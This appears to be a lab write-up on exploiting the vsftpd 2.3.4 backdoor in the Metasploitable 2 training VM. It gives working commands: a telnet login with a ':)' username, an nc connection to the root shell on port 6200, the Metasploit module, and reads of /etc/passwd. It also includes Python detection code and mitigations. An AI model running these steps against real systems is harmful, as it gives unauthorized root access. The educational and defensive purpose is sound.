May 15, 2026
One Smiley Face, One Root Shell: The vsftpd 2.3.4 Backdoor in Metasploitable 2
Manual exploitation with telnet and netcat, automated with metasploit and why this old backdoor still teaches new lessons today
R
Exploiting the vsftpd 2.3.4 Backdoor in Metasploitable 2
## Introduction
Metasploitable 2 is an intentionally vulnerable Linux VM designed by Rapid7 for security training. Among its ~30 open ports sits a particularly nasty vulnerability: vsftpd 2.3.4 running on port 21, which contains a malicious backdoor that was slipped into the source code archive between June 30 and July 1, 2011.
This isn't a configuration error or a coding bug — it's a supply-chain attack that made it into the official tarball. Understanding how it works is essential for every aspiring penetration tester.
## Lab Environment
- Kali Linux: Attacker Machine
- Metasploitable 2: Target Machine
- Vulnerable Service: vsftpd 2.3.4 (Port 21)
- Network: Host-Only / NAT
Step 1: Reconnaissance with Nmap
Before touching the exploit, verify the target is alive and identify the vulnerable service:
```bash
nmap -sV -p- 192.168.153.130
```
Key finding: Port 21 is open and running vsftpd 2.3.4 — a known vulnerable version.
Step 2: Understanding the Backdoor
The backdoor is elegantly simple: if a username ends with the sequence :), the FTP daemon spawns a root shell bound to port 6200.
Here's how the malicious code works behind the scenes:
```c
// Malicious snippet from vsftpd 2.3.4 (simplified rendering of the planted check)
// p_buf is the string buffer holding the USER argument; i walks over its bytes,
// so the comparison fires wherever the two bytes sit next to each other.
if (p_buf[i] == 0x3A && p_buf[i+1] == 0x29) { // ':' and ')'
    vsf_sysutil_extra(); // Opens backdoor on port 6200
}
```
The vsf_sysutil_extra() function sets up a TCP listener on port 6200 that drops you straight into a root shell when connected.
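To make the trigger condition concrete from the defender's side, here is an added example (not code from the original post or from vsftpd) that mirrors the byte comparison above in Python and pairs it with a banner check that flags the vulnerable version as reported by nmap. The function names and the sample banner strings are assumptions made for this example; note that the comparison scans every index of the buffer, exactly as the snippet's `p_buf[i]` / `p_buf[i+1]` test does.

```python
# Added example, not part of the original write-up or of vsftpd itself.
# Mirrors the backdoor's byte check and flags the 2.3.4 banner (assumed format).
import re
from typing import Optional, Tuple

TRIGGER_BYTES = (0x3A, 0x29)  # ':' and ')', the two bytes the planted code compares


def contains_backdoor_trigger(username: bytes) -> bool:
    """True if this login name would satisfy the planted check.

    The malicious snippet compares p_buf[i] and p_buf[i+1] for each index i,
    so the pair can sit anywhere in the buffer, not only at its end.
    """
    for i in range(len(username) - 1):
        if username[i] == TRIGGER_BYTES[0] and username[i + 1] == TRIGGER_BYTES[1]:
            return True
    return False


def user_command_is_trigger(command_line: bytes) -> bool:
    """Check a raw FTP control-channel line such as b'USER backdoored:)'."""
    verb, _, argument = command_line.strip().partition(b" ")
    return verb.upper() == b"USER" and contains_backdoor_trigger(argument)


# vsftpd greets with a banner like "220 (vsFTPd 2.3.4)"; the regex is tolerant
# of case and spacing because scanners and proxies rewrite banners freely.
BANNER_RE = re.compile(r"vsftpd\s+(\d+)\.(\d+)\.(\d+)", re.IGNORECASE)


def vsftpd_version(banner: str) -> Optional[Tuple[int, int, int]]:
    """Extract (major, minor, patch) from an FTP banner, or None if not vsftpd."""
    m = BANNER_RE.search(banner)
    return tuple(int(x) for x in m.groups()) if m else None


def is_backdoored_version(banner: str) -> bool:
    """Only the tampered 2.3.4 archive carried the backdoor, so match exactly.

    A banner match means "investigate this host", not "confirmed backdoored":
    clean 2.3.4 builds from before the tampering report the same version.
    """
    return vsftpd_version(banner) == (2, 3, 4)


if __name__ == "__main__":
    # Constructed sample inputs for a quick local run.
    for name in (b"anonymous", b"backdoored:)", b"x:)y"):
        print(name, contains_backdoor_trigger(name))
    for banner in ("220 (vsFTPd 2.3.4)", "220 (vsFTPd 3.0.3)", "220 ProFTPD Server"):
        print(banner, is_backdoored_version(banner))
```

Used in a login-hook or an IDS content match, `user_command_is_trigger` gives a precise signature for the trigger; `is_backdoored_version` is the inventory check to run against the output of the nmap scan from Step 1.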
Step 3: Manual Exploitation
Sometimes you need to understand the mechanics without relying on automation. Here's the manual approach:
```bash
# Connect to the FTP control port and trigger the backdoor
# (telnet defaults to port 23, so port 21 must be given explicitly)
telnet 192.168.153.130 21
# At the prompt, enter:
USER backdoored:)
PASS anything
# The connection will appear to hang. That's the signal.
# Now connect to the backdoor shell on the same host:
nc 192.168.153.130 6200
# Verify root access
whoami
# Output: root
id
# Output: uid=0(root) gid=0(root)
```
Why this matters: Manual exploitation proves you understand the underlying protocol and vulnerability mechanics — a critical skill that separates script kiddies from competent testers.
Step 4: Automated Exploitation with Metasploit
For efficiency in professional engagements, Metasploit automates this beautifully:
```bash
msfconsole
search vsftpd 2.3.4
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.153.130
exploit
```
Result: Immediate root shell with UID=0(root) GID=0(root)
Step 5: Post-Exploitation
With root access, enumerate the system:
```bash
uname -a
cat /etc/passwd
ifconfig
```
This demonstrates the full impact: complete system compromise from a single malformed FTP login.
## Mitigation & Lessons Learned
- Outdated vsftpd: Upgrade to patched versions immediately
- Unencrypted FTP: Replace with SFTP or FTPS
- No network segmentation: Isolate legacy services
- Missing monitoring: Alert on port 6200 connections
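The last item, alerting on port 6200, is the one a SOC can implement today, so here is an added example (not from the original post) that correlates two constructed log sources: FTP control-channel commands and firewall-style connection records. A `USER` command carrying the `:)` trigger is a medium-severity signal on its own; a subsequent connection from the same client to port 6200 on the FTP host within a few minutes raises it to high. The log formats, timestamps and client addresses are assumptions made for the example; the server address and port come from the write-up.

```python
# Added example, not part of the original write-up. Detects the vsftpd 2.3.4
# backdoor being triggered by correlating constructed FTP and connection logs.
import re
from datetime import datetime, timedelta
from typing import List, Tuple

FTP_HOST = "192.168.153.130"   # the Metasploitable target from the write-up
BACKDOOR_PORT = 6200           # listener opened by vsf_sysutil_extra()

# Constructed FTP control-channel log: <iso-time> <client-ip> <command line>
FTP_LOG = """\
2026-05-15T10:00:01 192.168.153.128 USER anonymous
2026-05-15T10:00:02 192.168.153.128 PASS guest@example.com
2026-05-15T10:01:10 192.168.153.140 USER backdoored:)
2026-05-15T10:01:11 192.168.153.140 PASS anything
"""

# Constructed firewall/flow log: <iso-time> src=<ip> dst=<ip> dport=<port>
CONN_LOG = """\
2026-05-15T10:00:01 src=192.168.153.128 dst=192.168.153.130 dport=21
2026-05-15T10:01:10 src=192.168.153.140 dst=192.168.153.130 dport=21
2026-05-15T10:01:15 src=192.168.153.140 dst=192.168.153.130 dport=6200
2026-05-15T10:05:00 src=192.168.153.128 dst=192.168.153.130 dport=22
"""

FTP_RE = re.compile(r"^(\S+) (\S+) USER (.*)$")
CONN_RE = re.compile(r"^(\S+) src=(\S+) dst=(\S+) dport=(\d+)$")

Event = Tuple[datetime, str]  # (timestamp, client address)


def trigger_logins(ftp_log: str) -> List[Event]:
    """USER commands whose argument carries the ':)' trigger bytes."""
    hits = []
    for line in ftp_log.splitlines():
        m = FTP_RE.match(line)
        if m and ":)" in m.group(3):
            hits.append((datetime.fromisoformat(m.group(1)), m.group(2)))
    return hits


def backdoor_port_connects(conn_log: str) -> List[Event]:
    """TCP connections to the backdoor port on the FTP host."""
    hits = []
    for line in conn_log.splitlines():
        m = CONN_RE.match(line)
        if m and m.group(3) == FTP_HOST and int(m.group(4)) == BACKDOOR_PORT:
            hits.append((datetime.fromisoformat(m.group(1)), m.group(2)))
    return hits


def detect(ftp_log: str, conn_log: str,
           window: timedelta = timedelta(minutes=5)) -> List[Tuple[str, str, str]]:
    """Return (severity, client, reason) alerts; severities are 'medium' or 'high'."""
    triggers = trigger_logins(ftp_log)
    alerts = [("medium", src, "FTP USER argument contained the ':)' backdoor trigger")
              for _, src in triggers]
    for t, src in backdoor_port_connects(conn_log):
        # Same client sent a trigger login shortly before: treat as confirmed use.
        correlated = any(src == tsrc and timedelta(0) <= t - tt <= window
                         for tt, tsrc in triggers)
        severity = "high" if correlated else "medium"
        alerts.append((severity, src, f"TCP connect to {FTP_HOST}:{BACKDOOR_PORT}"))
    return alerts


if __name__ == "__main__":
    for severity, client, reason in detect(FTP_LOG, CONN_LOG):
        print(f"[{severity}] {client}: {reason}")
```

Any connection to port 6200 on an FTP server is worth an alert by itself, because nothing legitimate listens there; the correlation step mainly helps triage, telling the analyst which alert corresponds to a completed trigger rather than a stray port scan.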
This vulnerability exemplifies why supply-chain security and version management are non-negotiable. A single compromised download archive compromised thousands of systems worldwide.
## Conclusion
The vsftpd 2.3.4 backdoor is a perfect storm of simplicity and severity. Whether you trigger it manually with telnet and nc or automate it with Metasploit, the lesson is clear: legacy services with known CVEs are low-hanging fruit for attackers. Practice this in your home lab, understand the mechanics, and carry that knowledge into real-world defense.
⚠️ Disclaimer: This write-up is for educational purposes only. Always obtain proper authorization before penetration testing.